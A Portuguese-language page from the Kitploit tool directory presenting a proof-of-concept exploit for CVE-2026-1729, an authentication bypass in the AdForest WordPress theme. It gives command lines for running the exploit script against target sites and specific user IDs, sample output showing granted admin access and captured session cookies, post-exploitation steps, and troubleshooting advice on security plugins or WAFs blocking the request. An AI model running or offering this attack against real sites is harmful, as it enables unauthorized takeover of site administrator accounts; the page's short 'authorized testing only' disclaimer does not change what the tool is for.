Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass — O tema AdForest para WordPress é vulnerável a bypass de autenticação em todas as versões, incluindo a 6.0.12. Isso se deve ao fato de o plugin não verificar corretamente a identidade de um usuário antes de autenticá-lo por meio da função 'sb_login_user_with_otp_fun'. Isso torna possível que atacantes não autenticados façam login, incluindo admin. | Kitploit
Ferramentas/GitHubGitHub/ninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de Penetração
GitHubninjazan420/cve-2026-1729-poc-adforest-wordpress-authentication-bypass

CVE-2026-1729-PoC-AdForest-WordPress-Authentication-Bypass

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
3há 7 mesesAinda não revisado

Sobre

O tema AdForest para WordPress é vulnerável a bypass de autenticação em todas as versões, incluindo a 6.0.12. Isso se deve ao fato de o plugin não verificar corretamente a identidade de um usuário antes de autenticá-lo por meio da função 'sb_login_user_with_otp_fun'. Isso torna possível que atacantes não autenticados façam login, incluindo admin.

Compartilhar

CVE-2026-1729 - PoC de Bypass de Autenticação do WordPress AdForest

Descrição

Prova de Conceito simples para CVE-2026-1729 (PoC) - Vulnerabilidade de bypass de autenticação no tema AdForest WordPress. Autor: f3ds cr3w est 2oo2 blog

Recursos

  • ✅ Acesso direto ao admin sem credenciais
  • ✅ Funciona em instâncias WordPress de produção
  • ✅ Não requer configuração Docker
  • ✅ Interface simples de linha de comando
  • ✅ Persistência de sessão

Requisitos

  • Python 3.6+
  • biblioteca requests

Instalação

root@kitploit:~
pip install requests

Uso

Uso Básico

root@kitploit:~
python poc/exploit.py https://target-site.com

Direcionar ID de Usuário Específico

root@kitploit:~
python poc/exploit.py https://target-site.com --user-id 2

Exemplos

root@kitploit:~
# Explora o admin padrão (ID de usuário 1)
python poc/exploit.py https://example.com

# Explora uma conta de usuário específica
python poc/exploit.py https://example.com --user-id 5

# Testa vários alvos
python poc/exploit.py https://site1.com
python poc/exploit.py https://site2.com --user-id 3

Saída

root@kitploit:~
CVE-2026-1729 - AdForest WordPress Authentication Bypass
=======================================================
WARNING: For authorized testing only!
=======================================================
[+] Target: https://example.com
[+] Targeting user ID: 1
[+] Sending exploit to: https://example.com/wp-admin/admin-ajax.php
[+] SUCCESS! Admin access granted
[+] Admin URL: https://example.com/wp-admin/
[+] Session cookies: {'wp-settings-time-1': '1234567890', 'wordpress_logged_in_...': '...'}
[+] Logged in as: admin

🎯 Exploit completed successfully!
You now have admin access to the WordPress site.

O Que Acontece Após a Exploração

  1. Acesso de Administrador: Você obtém acesso total de administrador ao /wp-admin/
  2. Persistência de Sessão: O exploit mantém os cookies de sessão
  3. Informações do Usuário: Mostra qual conta você comprometeu
  4. Acesso Direto: Você pode acessar imediatamente o painel administrativo do WordPress

Notas

  • Uso Legal: Use apenas em sites que você possui ou para os quais tenha permissão explícita para testar
  • Requisitos do Alvo: O site deve ter o tema AdForest instalado
  • Taxa de Sucesso: Funciona em versões vulneráveis do tema AdForest
  • Sem Instalação: Não é necessário instalar nada no servidor alvo

Resolução de Problemas

Se o exploit falhar:

  1. Verifique se o tema AdForest está instalado
  2. Verifique se o site está executando WordPress
  3. Certifique-se de que a versão do tema é vulnerável
  4. Verifique se não há WAF ou plugins de segurança bloqueando a solicitação
Baixar ferramenta